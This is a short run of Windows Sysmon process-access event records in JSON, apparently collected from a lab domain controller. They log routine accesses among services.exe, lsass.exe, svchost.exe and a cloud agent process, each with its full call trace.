{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.334\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001089BF0200}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.334","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001089BF0200}","TargetProcessId":"2508","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.360\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.360","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.360\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.360","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.362\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.362","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.363\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.363","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.363\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.363","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.363\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.363","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.363\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.363","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
